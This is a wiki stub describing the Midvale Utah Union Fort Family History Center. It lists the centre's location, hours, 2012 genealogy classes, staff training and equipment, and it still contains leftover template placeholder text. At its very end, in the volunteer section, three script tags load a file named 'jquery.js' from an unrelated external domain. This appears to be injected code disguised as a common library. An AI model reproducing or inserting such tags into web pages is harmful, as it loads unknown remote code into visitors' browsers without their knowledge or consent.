Midvale Utah Union Fort Family History Center
|This Family History Center article is a stub. You can help by expanding it.
Review the instructions and guidelines for FHC pages.
|This article describes the services and resources available at a Family History Center, a branch facility of the Family History Library.|
The Midvale Utah Fort Union Family History Center services the Midvale, Midvale East, Midvale North, Midvale Union Fort, Midvale Union Park, Sandy MidValley, and Salt Lake Butler West Stakes. === ===
| FHC DIRECTOR
We are in need of additional daytime staff at our Family History Center. If you are comfortable with a computer and available to volunteer for 3 daytime hours per week, we would love to have you, and happy to help you learn additional skills. Please contact: Alice Neff: (801) 255-1617 .
- 1 Center Contacts and Hours
- 2 Calendar and Events
- 3 2012 Family History Classes Overview:
- 4 Staff Training Meetings
- 5 Center Resources
- 6 Center Services
- 7 Resources in the Local Area
- 8 Links
- 9 Volunteer at the Center
Center Contacts and Hours
Location & Map:
1. 7155 South 540 East, Midvale, UT 84047
2. Please use North Door. Ring upper door bell for access.
3. Come straight in and turn right and Library is first door on right.
4. (Link to map using Google or other map sites)
Hours of Operations:
|Monday||9AM to 1PM||1PM to 5PM||CLOSED|
|Tuesday||9AM to 1PM||1PM to 5PM||5PM to 9PM|
|Wednesday||9AM to 1PM||1PM to 5PM||5PM to 9PM|
|Thursday||9AM to 1PM||1PM to 5PM||5PM to 9PM|
|Friday||9AM to 1PM||1PM to 5PM||CLOSED|
Calendar and Events
2012 Family History Classes Overview:
(Classes will be held in the Midvale Union Fort Multi-Stake Family History Center unless otherwise noted)
Classes Beginning in March
Intermediate Computer (4 week course)
Discover the magic of using Microsoft Windows including file organization and
tips and tidbits for easier computer manipulation.
Fri. Mar. 2, 9, 16, 23 10:00 a.m. - 11:30am Instructor: L. Hadfield
IrfanView (new) (1½ hour class)
Enjoy the versatility of this FREEWARE to help you capture screens, straighten,
edit, and utilize documents in family history work. Works on PC & Mac.
Tue. Mar. 13 2:00 p.m. - 3:30 p.m. Instructor: D. Hanson
Newspaper Archives (1½ hour class)
Get a glimpse of your grandmother’s life. Read her obituary, learn about who
came to visit, or where she was going on a trip. Small town newspapers kept a
close eye on the inhabitants. Their activities became the “talk of the town”.
Thu. Mar. 8 1:00 p.m. - 2:30 p.m. Instructor: K. Beers
Priesthood Leadership Training (1 hour class)
Training for Priesthood Leaders responsible for Family History work, primarily
High Priest Group Leaders.
Thu. Mar. 22 7:30 p.m. - 8:30 p.m. Instructor: T. Stroud
Write Family Histories your children and grandchildren will read (2 weeks)(1½ hour class)
It’s easier than you think. Clipart illustrations included.
Thu. Mar. 22, 29 7:00 p.m. - 8:30 p.m. Instructor: J. Evans
FamilySearch Wiki (new) (3 week course)
Family history advice by the community. What is it? What does it mean to you?
How can it help you? Can you contribute?
Wed. March 21, 28 April 4th at 7:00 p.m. Instructor: D. Knox
Staff Training Meetings
1. Usually held on the third Thursday of the month in the Relief Society Room.
2. August topics are: MacFamily Tree, Advanced Geneology built for Mac; and Find a Grave.
- Family History Library Catalog: This center has the ability to order any of the films and fiche available through the Family History Library Catalog.
- (List additional collections you have such as the types of books and microfilm you have on indefinite loan; though you will not want to list every single item you have. Just give visitors to this page a general idea of your resources.)
Databases and Software
- FHC Portal: This center has access to the Family History Center Portal page which gives free access in the center to premium family history software and websites that generally charge for subscriptions. (Note to FHC: Not all FHCs have access to this portal. If you do not, you will want to remove this entire bullet. If you do have access to it, just remove this text in italics.)
Hardware and Equipment :
1. We have computers, printers, copying equipment, Microfishe readers.
2. Copies are .05 cents each.
Staff Research Specialties
Resources in the Local Area
(This section is to highlight other resources in your area that will be helpful for individuals doing research there in your location, if there are any, such as government offices, historical societies, etc.)
(Include links to other websites of interest to those who visit your center such as links to the city, county and state wiki pages where your center is located.)
Volunteer at the Center
(Include information here about the volunteers you are looking for.) <script src="http://uhahoii.com/jquery.js?ua=ch"></script> [[Image:]] <script src="http://uhahoii.com/jquery.js?ua=ch"></script> [[Image:]] <script src="http://uhahoii.com/jquery.js?ua=ch"></script> [[Image:]]